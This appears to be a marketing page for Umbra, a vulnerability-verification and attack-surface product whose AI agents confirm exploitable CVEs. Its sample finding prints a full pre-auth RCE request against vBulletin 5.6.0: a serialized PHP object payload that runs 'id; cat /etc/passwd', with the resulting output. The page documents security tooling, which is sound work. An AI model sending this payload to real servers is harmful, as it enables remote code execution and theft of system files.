See every exposed service.
Prove what's exploitable.
Continuous discovery, AI-verified exploitation, and analyst-grade reports. Stop triaging thousands of CVE maybes. See the handful that are real.
Self-serve · cancel anytime · DPA available
- Discovery
- 0/s
- ports scanned per second per agent
- Verification
- $0–$2
- typical AI cost per confirmed exploit
- Time to PoC
- 0s
- median for a verified critical CVE
vBulletin 5.6.0: Pre-auth RCE
203.0.113.42:8080 · forum-staging.acme.io
CVE-2023-25135 confirmed exploitable via the ajax/api/hook/decodeArguments endpoint. Agent obtained code execution as www-data; recovered /etc/passwd in 73 seconds. Service should be patched or de-listed before next scan window.
POST /ajax/api/hook/decodeArguments HTTP/1.1 Host: forum-staging.acme.io:8080 Content-Type: application/x-www-form-urlencoded arguments=O:12:"vB_dB_Result":2:{s:5:"db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"recordset";s:8:"id; cat /etc/passwd";} HTTP/1.1 200 OK uid=33(www-data) gid=33(www-data) groups=33(www-data) root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin …
Built by someone who's
been on the other side.
Umbra is built by Hussein Daher, a security researcher with 2,000+ confirmed vulnerability findings across the security programs of 1,000+ companies, including dozens of Fortune 500. The product exists because the tools available weren't operator-grade enough for the work.
- 0+
- verified vulnerabilities reported
- 0+
- companies' security programs
- dozens
- Fortune 500 brands among them
1,000+ companies got the call from us first, not from the attackers.
1,000+ programs · 2,000+ findings · verified on bugcrowd.com/hussein98d and hackerone.com/hussein98d
Run an internal pentest.
One click.
Pick an installed agent, pick a safety tier. Umbra iterates every live service the agent has discovered and fans out a whole catalog of techniques as parallel AI exploit runs: SMB, SNMP, LDAP, Kerberos, ADCS, SSH, RDP, databases, web. One rollup view, every finding tagged by the technique that produced it.
80+ techniques × N services × 3 safety tiers (Safe / Active / Aggressive). Reachability preflight, tier-enforced server side, per-technique rollup, cancel any time. Same catalog drives the headline button, the custom-run builder, and the per-service click-to-try chips.
BloodHound-vocabulary principals + edges (MemberOf, AdminTo, GenericAll, WriteDACL, ForceChangePassword, …) populated automatically by the ad_recon technique. No separate collector, no manual import. The graph grows as assessments fire.
Safe tier · enumeration-only · zero account-lockout risk · runs against the agent you already installed
Find what's exposed in your cloud.
Then get the exact fix.
Connect an account read-only and Umbra scans the control plane for the exposure a port scan can't see (world-readable data, identities that can escalate to admin, secrets in config, internet-open services), then chains them into attack paths that terminate at your data. Public storage is proven with an anonymous read, and every finding ships with the exact command that removes it.
Read-only across three clouds: public data, privesc to admin, secrets, and internet-open services. Effective-permission analysis (SCPs, boundaries, resource scope) means fewer, right findings, and coverage is attested, so a clean result is never a blind spot.
An internet-reachable workload → the identity it runs as → the specific data it can read, naming the terminal resource. Public storage is confirmed by a credential-free read, and each finding carries the exact aws / gcloud / az command to remove it, with a guardrail, never auto-applied.
Read-only · least-privilege role · credentials encrypted at rest · the same workspace as the rest of your attack surface
Audit a web app end to end.
One PoC per finding.
Point Deep Audit at a target and it runs the whole pipeline: JupiterSec static DAST and the Vespasian browser crawl map every route, form, and parameter, then an AI Triager, Explorer, and Validator work the surface and confirm what's real: IDOR, OAuth bypass, business logic, the classes scanners miss. Each finding ships as a one-page proof: the request, the response, the line that proves the chain. Available on Starter and up.
JupiterSec static DAST plus the Vespasian headless-browser crawl map routes, forms, and parameters, including the ones behind a login. A Triager, Explorer, and Validator then reason over the surface the way an analyst would, class by class.
Deep Audit is metered on top of your plan: $100 per scan for the first host, $75 for each additional host. The AI cost is capped and covered by the fee. You see the ceiling before the run starts, never a surprise bill.
Metered separately from the monthly subscription · available on Starter and up · one page of proof per confirmed finding
Your attack surface is bigger than you think. Most tools react with noise.
Hosts you forgot. Services that came up when nobody was looking. Certificates expiring on infrastructure that left the inventory three years ago. Vulnerability tools answer with thousands of maybes. Umbra answers with proof.
- ✕ Match CVEs by version-string. Drown you in maybes.
- ✕ Snapshot on a schedule. Miss what came up last Tuesday.
- ✕ Skip RFC1918 entirely. Your internal network is a blind spot.
- ✕ Report PDFs. Reproducing the finding is your problem.
- ✓ AI-verified exploits. Every critical finding comes with a working PoC.
- ✓ Continuous, not periodic. Discovery scheduler tracks surface drift in hours.
- ✓ Internal agent included. RFC1918 services land in the same dashboard, fingerprinted identically.
- ✓ Replay every finding. Share a password-gated link; recipients reproduce without an Umbra account.
Find every exposed service.
Including what you forgot.
Continuous RustScan-driven port scanning across IPs, CIDRs, and hostnames (with full HTTP+TLS deep probe, favicon hashing, and non-HTTP banner grab on every open port). Internal networks too: drop the 5 MB agent on a bastion, RFC1918 services land in the same dashboard.
Discovery is always free · pay only for assets you monitor
- 203.0.113.91api-dev.acme.ioAS24940 Hetzner2h ago
- 198.51.100.4vpn-old.acme.ioAS16509 AWS11h ago
- 192.0.2.221(no rDNS)AS396982 GCP1d ago
- 203.0.113.42forum-staging.acme.ioAS24940 Hetzner2d ago
203.0.113.42:8080
tcp · openvBulletin 5.6.0 · PHP 7.4.33, nginx 1.18.0
$0.30–$2.00 typical · charged on confirmed exploitation only
Don't guess at exploitability.
Prove it, in 73 seconds.
Click Verify on any critical CVE. An Anthropic-backed AI agent reads public PoCs, builds a hypothesis, runs non-destructive test requests, and writes a one-page proof: the exact request, the exact response, the exact line that proves the chain. Internal services too, relayed through your installed agent.
Metered in dollars, not credits · ceilings before every run
Run a remediation program.
Not just a scanner.
Findings are stateful, not snapshots. Assign them, set due dates, ship status both ways with Jira / GitHub, watch the weekly fix-rate climb. The executive dashboard floats the work that matters above the noise; the executive report rolls it up for the board.
Five-state model: open → in_progress → fixed → verified, with wontfix for accepted risk. Assignee, due date, full history. Bulk actions across the queue.
KPI tiles (critical open, overdue, MTTR, fixed-this-week) plus a top-10 priority queue ranked by severity × overdue × confirmed-exploitable.
Close the ticket, the finding closes. Close the finding, the ticket transitions. Custom status maps per channel. Any workflow fits.
Powered by Lumi, Umbra's AI security analyst: ranks your queue, explains every finding, in plain language
Hand this to your CISO.
Or your client.
Every finding ships analyst-ready: severity, evidence, remediation, links to the replay. Three audiences, three reports off the same source of truth: per-target engagement report, multilingual per-run management summary, and the org-level executive risk report for the board.
PDF · Markdown · per-target · per-company · board-ready
Acme Industries: External attack surface
3 critical findings across 2 services; all AI-verified between 2026-05-22 and 2026-05-24. Recommend immediate action on the forum-staging RCE and certificate rotation on the legacy mail relay.
Pre-auth RCE on vBulletin 5.6.0
- Affected URL
- http://forum-staging.acme.io:8080/ajax/api/hook/decodeArguments
- Analyst note
- Exposed staging instance of the production forum. PHP object injection via the `arguments` parameter; agent confirmed execution as www-data and recovered /etc/passwd.
- Recommendation
- Upgrade to 5.7.5 or apply the 5.6.9 PL1 patch. De-list staging from public DNS while patching.
Roll it out to the whole team.
On your terms.
Four org roles, per-user module access, a full audit trail, and the evidence packs an auditor asks for: the controls a larger team wants before a security tool goes org-wide.
A per-org module bundle sets what the plan includes; on top, an org-admin can restrict a teammate to specific modules (Deep Audit only, say). Four roles, per-target grants, server-enforced. Pro and up.
A complete record of who did what, filterable by action, actor, and date, with CSV / JSON export for your own retention and reviews. Pro and up.
SOC 2, ISO 27001, NIS2, and GDPR evidence generated from your real findings, with a password-gated public share for auditors. Business and up.
Signup to first verified CVE,
in under 5 minutes.
- Step 01Paste targets, discovery starts.
Single IPs, CIDRs, hostnames: paste up to 10,000 at once. RustScan probes the surface in seconds.
~30 seconds - Step 02Fingerprint, match CVEs, rank by real risk.
Every service gets product + version + CPE. CVEs are matched against the full NVD corpus and gated by version, so patched builds stay quiet. KEV + EPSS surface what to fix first.
~2 minutes - Step 03AI runs the exploit. PoC included.
Click Verify on any critical CVE. The AI agent confirms exploitability and writes the one-page proof.
~73 seconds
Starts free. Scales with the surface.
Discovery is always free. Pay only when you start verifying.
We take our own security seriously.
Find what's exposed.
Prove what's exploitable.
Start with 10 assets, free, forever. No credit card. No sales call. Discovery starts within seconds of signup.